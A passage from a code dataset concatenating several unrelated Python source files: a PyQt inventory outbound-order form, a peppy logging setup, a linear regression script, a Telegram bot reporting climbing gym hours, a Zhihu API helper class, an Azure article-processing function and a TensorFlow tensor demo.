self.checkBox_2.setText('UnSubmited')\n self.checkBox_1.setChecked(False)\n self.checkBox_2.setChecked(True)\n super().setListFormSQL(sql_1, sql_2)\n #self.tableView.setColumnHidden(13, True)\n self.fSubmited_column = 2\n self.pub = JPPub()\n self.pub.UserSaveData.connect(self.UserSaveData)\n\n m_sql = \"\"\"\n SELECT fOrderID as 订单号码OrderID\n , fOrderDate as 日期OrderDate\n , fVendedorID as 销售人员Vendedor\n , fRequiredDeliveryDate as 交货日期RequiredDeliveryDate\n , fCustomerID as 客户名Cliente\n , fContato\n , fCelular\n , fTelefone\n , fAmount\n , fTax\n , fPayable\n , fDesconto\n , fNote\n ,fEntryID\n FROM t_product_outbound_order\n WHERE fOrderID = '{}'\n \"\"\"\n s_sql = \"\"\"\n SELECT fID, fOrderID, \n fProductID AS '名称Descrição', fQuant AS '数量Qtd',\n fPrice AS '单价P. Unitario', fAmount AS '金额Total'\n FROM t_product_outbound_order_detail\n WHERE fOrderID = '{}'\n \"\"\"\n self.setEditFormSQL(m_sql, s_sql)\n\n def UserSaveData(self, tbName):\n if tbName == 't_product_outbound_order':\n self.refreshListForm()\n\n def onGetModelClass(self):\n return OutboundOrderMod\n\n def getEditForm(self, sql_main, edit_mode, sql_sub, PKValue):\n\n frm = EditForm_OutboundOrder(sql_main=sql_main,\n edit_mode=edit_mode,\n sql_sub=sql_sub,\n PKValue=PKValue)\n frm.ui.fOrderID.setEnabled(False)\n frm.ui.fCity.setEnabled(False)\n frm.ui.fNUIT.setEnabled(False)\n frm.ui.fEntryID.setEnabled(False)\n frm.ui.fEndereco.setEnabled(False)\n frm.ui.fEmail.setEnabled(False)\n return frm\n\n @pyqtSlot()\n def on_CmdSubmit_clicked(self):\n cu_id = self.getCurrentSelectPKValue()\n if not cu_id:\n return\n db = JPDb()\n info = self.model.TabelFieldInfo\n submitted = info.getOnlyData([\n self.tableView.selectionModel().currentIndex().row(),\n self.fSubmited_column\n ])\n if submitted == 1:\n msg = '记录【{cu_id}】已经提交,不能重复提交!\\nThe order [{cu_id}] '\n msg = msg + 'has been submitted, can not be repeated submission!'\n msg = msg.replace(\"{cu_id}\", str(cu_id))\n QMessageBox.warning(self, '提示', msg, QMessageBox.Ok,\n QMessageBox.Ok)\n return\n msg = '提交后出库单将不能修改!确定继续提交记录【{cu_id}】吗?\\n'\n msg = msg + 'The order \"{cu_id}\" will not be modified after submission. '\n msg = msg + 'Click OK to continue submitting?'\n msg = msg.replace(\"{cu_id}\", str(cu_id))\n reply = QMessageBox.question(self, '确认', msg,\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n if reply == QMessageBox.Yes:\n sql0 = f\"\"\"UPDATE t_product_outbound_order set fSubmited=1 \n where fOrderID='{cu_id}';\"\"\"\n sql1 = f\"\"\"\n UPDATE t_product_information AS p,\n (SELECT fProductID,\n sum(fQuant) AS sum_sl\n FROM t_product_outbound_order_detail\n WHERE fOrderID='{cu_id}'\n GROUP BY fProductID) AS q1 SET p.fCurrentQuantity=p.fCurrentQuantity-q1.sum_sl\n WHERE p.fID=q1.fProductID;\n \"\"\"\n sql2 = \"select '{cu_id}';\"\n db.executeTransaction([sql0, sql1,sql2])\n JPPub().broadcastMessage(tablename=\"t_product_outbound_order\",\n PK=cu_id,\n action='Submit')\n self.refreshListForm()\n\n @pyqtSlot()\n def on_CmdExportToExcel_clicked(self):\n exp = JPExpExcelFromTabelFieldInfo(self.model.TabelFieldInfo,\n self.MainForm)\n exp.run()\n\n @pyqtSlot()\n def on_CmdEdit_clicked(self):\n cu_id = self.getCurrentSelectPKValue()\n if not cu_id:\n return\n info = self.model.TabelFieldInfo\n submitted = info.getOnlyData([\n self.tableView.selectionModel().currentIndex().row(),\n self.fSubmited_column\n ])\n if submitted == 1:\n msg = '记录【{cu_id}】已经提交,不能修改!\\nThe order [{cu_id}] '\n msg = msg + 'has been submitted, can not edit it!'\n msg = msg.replace(\"{cu_id}\", str(cu_id))\n QMessageBox.warning(self, '提示', msg, QMessageBox.Ok,\n QMessageBox.Ok)\n return\n frm = self.getEditForm(sql_main=self.SQL_EditForm_Main,\n sql_sub=self.SQL_EditForm_Sub,\n edit_mode=JPEditFormDataMode.Edit,\n PKValue=cu_id)\n frm.setListForm(self)\n frm.afterSaveData.connect(self.refreshListForm)\n self.__EditForm = None\n self.__EditForm = frm\n self.afterCreateEditForm.emit(JPEditFormDataMode.Edit)\n frm.exec_()\n\n\nclass mySubMod(JPTableViewModelReadOnly):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def data(self, index, role=Qt.DisplayRole):\n r = index.row()\n c = index.column()\n tab = self.TabelFieldInfo\n curid = tab.getOnlyData((r, 2)) # DataRows[r].Datas[0]\n\n if role == Qt.DisplayRole and c == 2:\n if curid:\n return self.getFullProductName(curid)\n elif role == Qt.TextAlignmentRole and c == 2:\n return (Qt.AlignLeft | Qt.AlignVCenter)\n\n else:\n return super().data(index, role=role)\n\n\nclass EditForm_OutboundOrder(JPFormModelMainHasSub):\n def __init__(self,\n sql_main=None,\n PKValue=None,\n sql_sub=None,\n edit_mode=JPEditFormDataMode.ReadOnly,\n flags=Qt.WindowFlags()):\n super().__init__(Ui_Form(),\n sql_main=sql_main,\n PKValue=PKValue,\n sql_sub=sql_sub,\n edit_mode=edit_mode,\n flags=flags)\n\n JPPub().MainForm.addLogoToLabel(self.ui.label_logo)\n self.setPkRole(8)\n self.cacuTax = True\n self.ui.fTax.keyPressEvent = self.__onTaxKeyPress\n self.readData()\n if self.isNewMode:\n self.ObjectDict()['fEntryID'].refreshValueNotRaiseEvent(\n JPUser().currentUserID())\n else:\n self.__customerIDChanged()\n if edit_mode != JPEditFormDataMode.ReadOnly:\n self.ui.fCustomerID.setEditable(True)\n self.ui.fOrderDate.refreshValueNotRaiseEvent(QDate.currentDate())\n self.ui.fRequiredDeliveryDate.FieldInfo.NotNull = True\n self.ui.fCustomerID.setFocus()\n self.ui.tableView.keyPressEvent = self.mykeyPressEvent\n self.ui.tableView.doubleClicked.connect(self.table_change)\n self.productInfo = self.__getProductInfo()\n self.subModel.getFullProductName = self.getFullProductName\n self._setEditFormButtonsIcon(self.ui)\n\n def _setEditFormButtonsIcon(self, ui):\n pub = JPPub()\n fun = pub.MainForm.addOneButtonIcon\n fun(ui.butSave, \"save.png\")\n fun(ui.butPrint, \"print.png\")\n fun(ui.butPDF, \"pdf.png\")\n\n def __getProductInfo(self):\n sql = \"\"\"\n select fID,fProductName, fCurrentQuantity ,\n fSpesc,fWidth,fLength,fUint\n from t_product_information where fCancel=0\n \"\"\"\n lst = JPDb().getDataList(sql)\n return {r[0]: r[1:] for r in lst}\n\n def getFullProductName(self, curid):\n if curid:\n r = self.productInfo[curid]\n r1 = [r[0]]\n for i in range(len(r)):\n if i >= 2 and r[i]:\n r1.append(r[i])\n return \" /\".join(r1)\n\n def onGetModelClass(self):\n return mySubMod\n\n def table_change(self, index1):\n def fun(p_id, product_name, fCurrentQuantity):\n tab = self.subModel.TabelFieldInfo\n tab.setData([r, 2], p_id)\n\n r = index1.row()\n if index1.column() == 2 and not self.isReadOnlyMode:\n frm = ProductSelecter()\n frm.ProductSeledted.connect(fun)\n frm.exec_()\n\n # 手动增加空行\n def mykeyPressEvent(self, KeyEvent):\n if (KeyEvent.modifiers() == Qt.AltModifier\n and KeyEvent.key() == Qt.Key_D):\n mod = self.subModel\n l = len(self.subTableFieldsInfo)\n mod.insertRows(l, 1, mod.createIndex(0, l))\n\n def __customerIDChanged(self):\n c_id = self.ui.fCustomerID.Value()\n if not c_id:\n return\n sql = f'''select fNUIT,fCity,fContato,fAreaCode,\n fCelular,fTelefone,fEndereco,fEmail,\n fWeb,fFax,fNote ,fTaxRegCer\n from t_customer \n where fCustomerID={c_id}'''\n dic = JPDb().getDict(sql)[0]\n if self.isNewMode:\n self.ui.fCelular.refreshValueNotRaiseEvent(dic['fCelular'], True)\n self.ui.fContato.refreshValueNotRaiseEvent(dic['fContato'], True)\n self.ui.fTelefone.refreshValueNotRaiseEvent(dic['fTelefone'], True)\n self.ui.fNUIT.setText(dic['fNUIT'])\n self.ui.fCity.setText(dic['fCity'])\n self.ui.fEndereco.setText(dic['fEndereco'])\n self.ui.fEmail.setText(dic['fEmail'])\n\n def onGetColumnFormulas(self):\n fla = \"JPRound(JPRound({3}) * JPRound({4},3),3)\"\n return [(5, fla)]\n\n def __onTaxKeyPress(self, KeyEvent):\n if (KeyEvent.modifiers() == Qt.AltModifier\n and KeyEvent.key() == Qt.Key_Delete):\n self.cacuTax = False\n self.ObjectDict()['fTax'].refreshValueRaiseEvent(None, True)\n elif (KeyEvent.modifiers() == Qt.AltModifier\n and KeyEvent.key() == Qt.Key_T):\n self.cacuTax = True\n self.ObjectDict()['fTax'].refreshValueRaiseEvent(None, True)\n\n def onGetHiddenColumns(self):\n return [1]\n\n def onGetReadOnlyColumns(self):\n return [2, 5]\n\n def onGetColumnWidths(self):\n return [25, 0, 500, 100, 100, 100]\n\n def onGetFieldsRowSources(self):\n pub = JPPub()\n u_lst = [[item[1], item[0]] for item in JPUser().getAllUserList()]\n return [('fCustomerID', pub.getCustomerList(), 1),\n ('fVendedorID', pub.getEnumList(10), 1),\n ('fEntryID', u_lst, 1)]\n\n def onGetReadOnlyFields(self):\n return [\"fEntryID\", 'fAmount', 'fPayable', 'fTax', 'fEmail']\n\n def onGetDisableFields(self):\n return ['fOrderID', 'fCity', 'fNUIT', \"fEntryID\", 'fEndereco']\n\n def onDateChangeEvent(self, obj, value):\n\n if not isinstance(obj, QModelIndex):\n if obj.objectName() == \"fCustomerID\":\n if self.ui.fCustomerID.currentIndex() != -1:\n self.__customerIDChanged()\n return\n\n fAmount = None\n temp_fDesconto = self.ui.fDesconto.Value()\n fDesconto = temp_fDesconto if temp_fDesconto else 0\n fAmount = self.getColumnSum(5)\n if fAmount is None:\n self.ui.fAmount.refreshValueNotRaiseEvent(None, True)\n self.ui.fTax.refreshValueNotRaiseEvent(None, True)\n self.ui.fPayable.refreshValueNotRaiseEvent(None, True)\n return\n else:\n self.ui.fAmount.refreshValueNotRaiseEvent(fAmount, True)\n\n fTax = 0.0\n if self.cacuTax:\n fTax = JPRound((fAmount - fDesconto) * 0.17, 2)\n self.ui.fTax.refreshValueNotRaiseEvent(fTax, True)\n else:\n fTax = self.ui.fTax.Value()\n\n fPayable = fAmount + fTax - fDesconto\n self.ui.fPayable.refreshValueNotRaiseEvent(fPayable, True)\n\n def onAfterSaveData(self, data):\n act = 'new' if self.isNewMode else 'edit'\n JPPub().broadcastMessage(tablename=\"t_product_outbound_order\",\n action=act,\n PK=data)\n if self.isNewMode:\n self.ui.fOrderID.refreshValueNotRaiseEvent(data, True)\n\n def afterSetDataBeforeInsterRowEvent(self, row_data, Index):\n # 用于判断可否有加行\n if row_data is None:\n return False\n if row_data[5] is None:\n return False\n return True\n # data = row_data\n # if data[7] == 0:\n # return False\n # lt = [data[2], data[4], data[5], data[6], data[7]]\n # lt = [float(str(i)) if i else 0 for i in lt]\n # return int(lt[4] * 100) == int(\n # reduce(lambda x, y: x * y, lt[0:4]) * 100)\n\n @pyqtSlot()\n def on_butPrint_clicked(self):\n try:\n rpt = Outbound_Order_Report()\n rpt.getFullProductName = self.getFullProductName\n rpt.BeginPrint(self.ui.fOrderID.Value())\n except Exception as identifier:\n msg = \"打印过程出错,错误信息为:{}\".format(str(identifier))\n QMessageBox.warning(self, '提示', msg, QMessageBox.Ok,\n QMessageBox.Ok)\n\n @pyqtSlot()\n def on_butSave_clicked(self):\n try:\n lst = self.getSqls(self.PKRole)\n isOK, result = JPDb().executeTransaction(lst)\n if isOK:\n self.onAfterSaveData(result)\n try:\n self.ui.butSave.setEnabled(False)\n self.ui.butPrint.setEnabled(True)\n self.ui.butPDF.setEnabled(True)\n except Exception as e:\n print(str(e))\n self.afterSaveData.emit(result)\n QMessageBox.information(self, '完成',\n '保存数据完成!\\nSave data complete!')\n except Exception as e:\n msgBox = QMessageBox(QMessageBox.Critical, u'提示', str(e))\n msgBox.exec_()\n","sub_path":"lib/ZionWidgets/OutboundOrder.py","file_name":"OutboundOrder.py","file_ext":"py","file_size_in_byte":17995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"495327554","text":"\"\"\"Project configuration, particularly for logging.\n\nProject-scope constants may reside here, but more importantly, some setup here\nwill provide a logging infrastructure for all of the project's modules.\nIndividual modules and classes may provide separate configuration on a more\nlocal level, but this will at least provide a foundation.\n\n\"\"\"\n\nimport logging\nimport os\nfrom sys import stdout\n\nfrom ._version import __version__\nfrom .attribute_dict import AttributeDict\nfrom .const import *\nfrom .exceptions import PeppyError\nfrom .project import Project, ProjectContext\nfrom .sample import Sample, Subsample\n\n\n__classes__ = [\"AttributeDict\", \"Project\", \"Sample\"]\n__all__ = __classes__ + [\"PeppyError\"]\n\n\nLOGGING_LEVEL = \"INFO\"\nLOGGING_LOCATIONS = (stdout, )\n\n# Default user logging format is simple\nDEFAULT_LOGGING_FMT = \"%(message)s\"\n# Developer logger format is more information-rich\nDEV_LOGGING_FMT = \"%(module)s:%(lineno)d (%(funcName)s) [%(levelname)s] > %(message)s \"\n\n\n# Ensure that we have a handler and don't get a logging exception.\n# Note that this was originally with looper.models.\n_LOGGER = logging.getLogger(__name__)\nif not logging.getLogger().handlers:\n _LOGGER.addHandler(logging.NullHandler())\n\n\n\ndef setup_peppy_logger(level, additional_locations=None, devmode=False):\n \"\"\"\n Establish a project logger.\n\n This configures a logger to provide information about pep models.\n Verbosity, destination(s) for messages, and message text format are\n controlled by the arguments' values. This is also used by the test suite.\n\n :param int | str level: logging level\n :param tuple(str | FileIO[str]) additional_locations: supplementary\n destination(s) to which to ship logs\n :param bool devmode: whether to use developer logging config\n :return logging.Logger: project-root logger\n \"\"\"\n\n logging.addLevelName(5, \"VERY_FINE\")\n\n fmt = DEV_LOGGING_FMT if devmode else DEFAULT_LOGGING_FMT\n\n # Establish the logger.\n LOOPER_LOGGER = logging.getLogger(\"peppy\")\n # First remove any previously-added handlers\n LOOPER_LOGGER.handlers = []\n LOOPER_LOGGER.propagate = False\n\n # Handle int- or text-specific logging level.\n try:\n level = int(level)\n except ValueError:\n level = level.upper()\n\n try:\n LOOPER_LOGGER.setLevel(level)\n except Exception:\n logging.error(\"Can't set logging level to %s; instead using: '%s'\",\n str(level), str(LOGGING_LEVEL))\n level = LOGGING_LEVEL\n LOOPER_LOGGER.setLevel(level)\n\n # Process any additional locations.\n locations_exception = None\n where = LOGGING_LOCATIONS\n if additional_locations:\n if isinstance(additional_locations, str):\n additional_locations = (additional_locations, )\n try:\n where = LOGGING_LOCATIONS + tuple(additional_locations)\n except TypeError as e:\n locations_exception = e\n if locations_exception:\n logging.warn(\"Could not interpret {} as supplementary root logger \"\n \"target destinations; using {} as root logger location(s)\".\n format(additional_locations, LOGGING_LOCATIONS))\n\n # Add the handlers.\n formatter = logging.Formatter(fmt=(fmt or DEFAULT_LOGGING_FMT))\n for loc in where:\n if isinstance(loc, str):\n # File destination\n dirpath = os.path.abspath(os.path.dirname(loc))\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n handler_type = logging.FileHandler\n elif hasattr(loc, \"write\"):\n # Stream destination\n handler_type = logging.StreamHandler\n else:\n # Strange supplementary destination\n logging.info(\"{} as logs destination appears to be neither \"\n \"a filepath nor a stream.\".format(loc))\n continue\n\n if handler_type is logging.FileHandler:\n handler = handler_type(loc, mode='w')\n else:\n handler = handler_type(loc)\n\n handler.setLevel(level)\n handler.setFormatter(formatter)\n LOOPER_LOGGER.addHandler(handler)\n\n return LOOPER_LOGGER\n","sub_path":"peppy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"148260012","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn import metrics\n\ndf = pd.read_csv('USA_Housing.csv')\n\nprint(df.info())\nprint(df.columns)\n\nsns.pairplot(df)\nplt.show()\nsns.heatmap(df.corr())\nplt.show()\nx = df[['Avg. Area Income', 'Avg. Area House Age', 'Avg. Area Number of Rooms',\n 'Avg. Area Number of Bedrooms', 'Area Population']]\nprint(x)\ny = df['Price']\n\n\n#Divide o x e o y para criar os DF de treinamento e de teste.\n#O tamaanho dos df é de acordo com o test_size\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.4, random_state=101)\nprint(x_train.shape[0])\nprint(x_test.shape[0])\n\nlm = LinearRegression()\nlm.fit(x_train, y_train)\n#Inicio da reta no Y\nprint(lm.intercept_)\n#Coeficientes\nprint(lm.coef_)\n\ncoefs = pd.DataFrame(lm.coef_, x.columns, ['Coefs'])\nprint(coefs)\n\npredict = lm.predict(x_test)\n#Valor real pelo valor previsto\nplt.figure(figsize=(14,7))\nplt.scatter(x=y_test, y=predict)\nplt.show()\n#Printa o erro\nsns.distplot(y_test-predict)\nplt.show()\n\n\n#Erros\nprint(\"MAE\", metrics.mean_absolute_error(y_test, predict))\nprint(\"MSE\", metrics.mean_squared_error(y_test, predict))\nprint(\"RMSE\", np.sqrt(metrics.mean_squared_error(y_test, predict)))\n","sub_path":"regressao_linear/regressao_linear.py","file_name":"regressao_linear.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"193467403","text":"import argparse\nimport requests\nimport json\nimport time\nimport datetime\nimport telepot\nimport numpy as np \nimport pandas as pd\nfrom bs4 import BeautifulSoup\nfrom telepot.loop import MessageLoop\n\n\nTOKEN = None\n\nclass ZenitBot:\n '''\n this bot finds the opening hours of the zenit gym and posts them into a chat if asked to\n if added to a chat, print /info to get functions\n\n __init__() - \n get_week_changes() - \n get_todays_time() - \n get_week_time() - \n get_info() - \n handle() - \n '''\n\n def __init__(self):\n '''\n initialize telegram bot\n '''\n\n self.bot = telepot.Bot(TOKEN)\n self.dt = pd.read_json('/home/hanzule/zenit/default_times.json') # load default opening hours\n MessageLoop(self.bot, self.handle).run_as_thread()\n\n\n def get_week_changes(self):\n '''\n parse zenit home page for updates in opening times for the current week\n create pandas dataframe and compare it with the default times\n if there are differences, print them \n if not, print just the no differences message\n '''\n\n # parse zenit web page\n info = requests.get('https://www.zenit-klettern.de/')\n soup = BeautifulSoup(info.text, 'html.parser')\n\n block = soup.find('div', {'id': 'c23'})\n hours = block.find_all('td')\n element = []\n for s in hours:\n element.append(s.text)\n\n # create dataframe and compare\n self.ct = pd.DataFrame([element[7:14], element[14:]], columns=element[:7])\n rows, cols = np.where((self.dt.values == self.ct.values) == False)\n\n if len(cols) > 0:\n # find changed times if there are differences\n response = ''\n for i in range(len(cols)):\n col = int(cols[i])\n row = int(rows[i])\n day = self.ct.keys()[col]\n new_time = self.ct.values[row,col]\n old_time = self.dt.values[row,col]\n\n if row == 0:\n string = 'öffnet'\n else:\n string = 'schließt'\n\n response = response + 'Die Halle {} diese Woche am {} um {} Uhr.\\n'.format(string,day,new_time)\n\n else:\n # write default text if there are no differences\n response = 'Die Öffnungszeiten in dieser Woche sind bisher unverändert.'\n\n return response\n\n\n def get_todays_time(self):\n ''' \n returns the opening hours for today\n '''\n\n today = datetime.datetime.today().weekday()\n\n # parse zenit web page\n info = requests.get('https://www.zenit-klettern.de/')\n soup = BeautifulSoup(info.text, 'html.parser')\n\n block = soup.find('div', {'id': 'c23'})\n hours = block.find_all('td')\n element = []\n for s in hours:\n element.append(s.text)\n\n # create dataframe \n self.ct = pd.DataFrame([element[7:14], element[14:]], columns=element[:7])\n\n times = self.ct[self.ct.columns[today]].values\n response = 'Die Halle öffnet heute um {} Uhr und schließt um {} Uhr.'.format(times[0], times[1])\n\n # check if opening hours are regular toady\n if (self.ct[self.ct.columns[today]].values == self.dt[self.dt.columns[today]].values).all():\n response = response + ' Die Öffnungszeiten sind heute regulär.'\n else:\n response = response + ' Die Öffnungszeiten für heute sind verändert.'\n\n return response\n\n\n def get_week_time(self):\n ''' \n returns the opening hours for this week\n '''\n\n # parse zenit web page\n info = requests.get('https://www.zenit-klettern.de/')\n soup = BeautifulSoup(info.text, 'html.parser')\n\n block = soup.find('div', {'id': 'c23'})\n hours = block.find_all('td')\n element = []\n for s in hours:\n element.append(s.text)\n\n # create dataframe \n self.ct = pd.DataFrame([element[7:14], element[14:]], columns=element[:7])\n\n response = 'Die Öffnungszeiten für diese Woche sind: \\n'\n for column in self.ct:\n response = response + column + ': ' + str(self.ct[column].values[0]) + ' - ' + str(self.ct[column].values[1]) + '\\n'\n\n return response\n\n\n def get_info(self):\n '''\n sends info text to chat\n should contain all or the most important functions\n '''\n\n response = 'Ich bin ein Bot und kann euch über die Öffnungszeiten der Kletterhalle informieren. Wenn Ihr was wissen wollt, fragt einfach:\\n\\\n /heute - gibt euch die heutigen Öffnungszeiten\\n\\\n /woche - gibt euch die Öffnungszeiten für diese Woche\\n\\\n /anders - gibt euch alle Veränderunge für diese Woche\\n\\\n mehr kommt noch...'\n\n return response\n\n\n\n def handle(self, msg):\n ''' \n handle commands given to bot\n '''\n \n chat_id = msg['chat']['id']\n command = msg['text']\n\n if command == '/anders':\n # send changes in opening times to chat\n message = self.get_week_changes()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/heute':\n # send todays opening times to chat\n message = self.get_todays_time()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/woche':\n # send todays opening times to chat\n message = self.get_week_time()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/info':\n # implement helper command\n message = self.get_info()\n print(message)\n self.bot.sendMessage(chat_id, message)\n\n elif command == '/echo':\n # print chat_id so that bot can post into group chats\n print(chat_id)\n \n\n\n\nif __name__ == '__main__':\n #ArgumentParser\n parser = argparse.ArgumentParser(description='Telegram Bot TOKEN:')\n parser.add_argument('-tk','--Token', help='gimme the token', type=str)\n args = vars(parser.parse_args())\n\n TOKEN = args['Token']\n\n zb = ZenitBot()\n print (\"Let's go...\")\n while 1:\n time.sleep(10)\n\n\n\n","sub_path":"zenit_bot.py","file_name":"zenit_bot.py","file_ext":"py","file_size_in_byte":6348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"96844828","text":"#! python3\r\n# -*- coding: utf-8 -*-\r\n# @Author: Drake-Z\r\n# @Date: 2017-09-26 10:47:42\r\n# @Last Modified time: 2017-10-29 10:32:39\r\n\r\nimport json\r\nimport random\r\nimport requests\r\nimport logging\r\nfrom retrying import retry\r\nfrom datetime import datetime\r\n\r\nfrom ZhihuAPI import URL\r\nfrom ZhihuAPI import ZhihuError\r\nfrom ZhihuAPI import settings\r\n\r\n\r\nclass Model(requests.Session):\r\n \"\"\"\r\n 获取知乎数据对象的抽象既基类,任何对象都可以继承该类\r\n \"\"\"\r\n\r\n def __init__(self, debug=0):\r\n super(Model, self).__init__()\r\n requests.packages.urllib3.disable_warnings()\r\n self.logger = self.create_logger(debug)\r\n self.headers = settings.HEADERS\r\n\r\n def create_logger(self, debug):\r\n logging.basicConfig(format=\"[%(filename)s line:%(lineno)d %(asctime)s] %(message)s\",\r\n datefmt=\"%H:%M:%S\",)\r\n logger = logging.getLogger(__name__)\r\n level = [logging.INFO, logging.DEBUG][debug]\r\n logger.setLevel(level)\r\n return logger\r\n\r\n @retry(stop_max_attempt_number=3, wait_fixed=3)\r\n def _request(self, method=\"post\", url=None, params=None, data=None, **kwargs):\r\n \"\"\"\r\n 通用请求方法\r\n :param method: 请求方法\r\n :param url: 请求URL\r\n :param params: 请求参数\r\n :param data: 请求数据\r\n :param kwargs: requests支持的参数,比如可以设置代理参数\r\n :return: response\r\n \"\"\"\r\n r = getattr(self, method)(url, data=data, params=params, timeout=40, **kwargs)\r\n return r\r\n\r\n @classmethod\r\n def save_file(cls, filepath, mode=\"w\", content=None, **kwargs):\r\n \"\"\"\r\n 通用保存文件方法\r\n :param filepath: 保存文件路径名\r\n :param mode: 保存模式\r\n :param content: 保存内容\r\n \"\"\"\r\n with open(filepath, mode, **kwargs) as file:\r\n file.write(content)\r\n\r\n @classmethod\r\n def get_content(cls, response):\r\n \"\"\"\r\n 通用返回 response 中的 text 方法\r\n :param response: 请求 response\r\n :return: response.text\r\n \"\"\"\r\n if response.text[0] == \"{\":\r\n return json.dumps(response.json(), indent=4, sort_keys=True, ensure_ascii=False)\r\n else:\r\n return response.content.decode('utf-8')\r\n\r\n @classmethod\r\n def get_cur_info(cls):\r\n \"\"\"\r\n 通用返回代码执行处所在文件、函数、行号方法\r\n http://www.cnblogs.com/qq78292959/archive/2013/08/29/3289658.html\r\n :type return: dict\r\n :return: func_info\r\n \"\"\"\r\n import sys\r\n try:\r\n raise Exception\r\n except:\r\n func = sys.exc_info()[2].tb_frame.f_back\r\n func_info = {\"filepath\": func.f_code.co_filename,\r\n \"func_name\": func.f_code.co_name,\r\n \"row\": func.f_lineno\r\n }\r\n return func_info\r\n\r\n @classmethod\r\n def judge_error(cls, response, data_type, condition):\r\n \"\"\"\r\n 通用判断 response 是否满足要求方法\r\n :param response: 请求 response\r\n :param data_type: response 内容应属于的类型\r\n :param condition: 判断错误的关键参数\r\n :type return: bool or dict\r\n :return: 无错误返回 False,有错误返回 err_args dict:{\"error\": Exception(……), \"data_type\": data_type, \"response\": response, \"condition\": condition}\r\n \"\"\"\r\n content = None\r\n try:\r\n assert response.ok is True\r\n if data_type == \"json\":\r\n content = response.json()\r\n else:\r\n content = response.text\r\n assert (eval(condition)) is True\r\n return False\r\n except AssertionError:\r\n if content:\r\n return ZhihuError(\"response 返回内容不符合 condition 条件\")\r\n else:\r\n return ZhihuError(\"response 状态码不正确\")\r\n except ValueError:\r\n return ZhihuError(\"response 返回类型不正确,json 解码错误\")\r\n except Exception as error:\r\n return error\r\n\r\n @classmethod\r\n def save_error(cls, func_info, err_args):\r\n \"\"\"\r\n 保存错误 response 内容\r\n :param func_info: 错误出现所在函数信息\r\n :param err_args: _judge_error 信息,需要 response、error、data_type、condition\r\n \"\"\"\r\n time_now = str(datetime.now())[:-7]\r\n status_code = err_args[\"response\"].status_code\r\n error_type = [\"网络错误\", \"内容错误\"][status_code == requests.codes.ok]\r\n content = cls.get_content(err_args[\"response\"])\r\n\r\n error_content = (\"错误时间: {time}\\n错误类型: {error_type} - {error}\\n来源文件: {filepath}\\n\"\r\n \"来源函数: {func_name} 行号: {row}\\n当前账号: {account}\\n请求 url: {url}\\n\"\r\n \"预期数据格式: {data_type}\\n预期条件: {condition}\\n状态码: {status_code}\\n\"\r\n \"headers: {headers}\\ncookies: {cookies}\\nresponse 内容:\\n{content}\"\r\n ).format(time=time_now,\r\n error_type=error_type,\r\n error=(err_args[\"error\"].__class__.__name__ + \": \" + str(err_args[\"error\"])),\r\n filepath=func_info[\"filepath\"],\r\n func_name=func_info[\"func_name\"],\r\n account=err_args[\"account\"],\r\n url=err_args[\"url\"],\r\n headers=err_args[\"headers\"],\r\n cookies=err_args[\"cookies\"],\r\n row=func_info[\"row\"],\r\n data_type=err_args[\"data_type\"],\r\n condition=err_args[\"condition\"],\r\n status_code=status_code,\r\n content=content)\r\n charcs = \"\".join(random.sample(settings.SEED, k=8))\r\n filepath = URL.error_path(error_type=error_type, charcs=charcs)\r\n cls.save_file(filepath=filepath, content=error_content, encoding=\"utf-8\")\r\n return None\r\n","sub_path":"ZhihuAPI/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"581901568","text":"import azure.functions as func\nfrom ProcessURL.processing.article_processor import ArticleProcessor\nfrom json import dumps as jsonify\n\nimport nltk\nnltk.data.path.append('./nltk_data')\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n url = req.params.get('url')\n\n if not url:\n return func.HttpResponse(\"Please provide a valid URL.\", status_code=400)\n else:\n proc = ArticleProcessor(url)\n\n result = {\n \"authors\": proc.get_authors(),\n \"title\": proc.get_heading(),\n \"summary\": proc.get_summary(),\n \"image_url\": proc.get_image(),\n \"ws_puzzle_url\": proc.get_word_search(),\n \"vocabulary\": proc.get_keyword_definitions()\n }\n\n return func.HttpResponse(jsonify(result), mimetype=\"application/json\")","sub_path":"ProcessURL/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"540331131","text":"import tensorflow as tf\n\"\"\"\n张量 在计算中如何存储\n标量 一个数字\n向量 一维数组 [1, 2, 3] 一阶张量\n矩阵 二维数组 [1, 2, 3,][1, 2, 3] 二阶张量\n\"\"\"\n\"\"\"\n张量 n维数组\n 两个属性\n 1) 张量的类型\n 2)张量的阶\n 创建张量的时候如果不指定类型\n 默认\n 整型 tf.int32\n 浮点型 tf.float32\n 创建张量的指令\n tf.constant() 创建一个常量\n tf.variable() 创建一个变量\n tf.random_normal()创建一个随机的张量\n 特殊的张量\n tf.Variable()\n tf.placeholder()\n 张量的变换\n 属性的修改\n ndarray\n 类型的修改 \n ndarray.astype(type)\n ndarray.tostring()\n 形状的修改\n ndarray.reshape(shape)\n 1)tf.cast(tensor, dtype)\n # 创建变量\n\"\"\"\ndef tensor_demo():\n \"\"\"\n 张量的演示\n \"\"\"\n tensor1 = tf.constant(2.0)\n tensor2 = tf.constant([1, 2, 3, 4], name=\"hello\")\n linera_squares = tf.constant([[1], [2], [3]], dtype=tf.int32)\n self_graph = 